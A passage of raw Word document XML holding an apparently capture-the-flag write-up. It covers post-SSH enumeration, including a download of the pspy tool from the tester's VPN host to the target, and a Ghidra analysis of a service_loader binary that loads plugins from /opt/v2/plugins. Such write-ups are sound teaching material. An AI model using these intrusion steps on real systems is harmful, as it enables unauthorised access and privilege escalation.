          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.sdyly513um2y" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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remote SSH access established, we used the </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">pspy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to monitor, in real time, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">processes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">running on the machine, including those initiated by other users and scheduled tasks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cron),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> without requiring elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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pspy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary was downloaded to the target machine, allowing it to be executed locally to monitor processes and commands running on the system in real time.</w:t>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&lt;vpn-ip&gt;/pspy</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622300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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62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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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88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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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1955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During process monitoring with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service_loader </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was identified running from the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/service_loader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, associated with user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 1002.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="109"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943600" cy="115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was identified that user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 1002</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> corresponds to the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">astrid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating that the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service_loader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs in the context of this user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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84200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="110"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58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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">transferred the file to our local machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reverse engineering, allowing inspection of the code, identification of relevant functions, and understanding of the program’s execution flow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="111"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, press the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">G</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> key to use the search shortcut, locate the available functions, and select the main function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to begin analyzing the binary’s execution flow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="112"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943600" cy="317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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function selected, we used the shortcut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view the decompiled source code, facilitating analysis of logic, function calls, and overall behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="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Line 17:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Opens the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/v2/plugins</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate available plugins.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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Line 26:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Builds the full plugin file path (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/v2/plugins/arquivo.so).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="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Line 27:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dlopen()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library into memory.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="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Line 28:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dlsym()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate the function</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin_init</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the loaded library.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="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Line 29: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executes the located function</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  (plugin_init())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summary, the binary implements a dynamic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
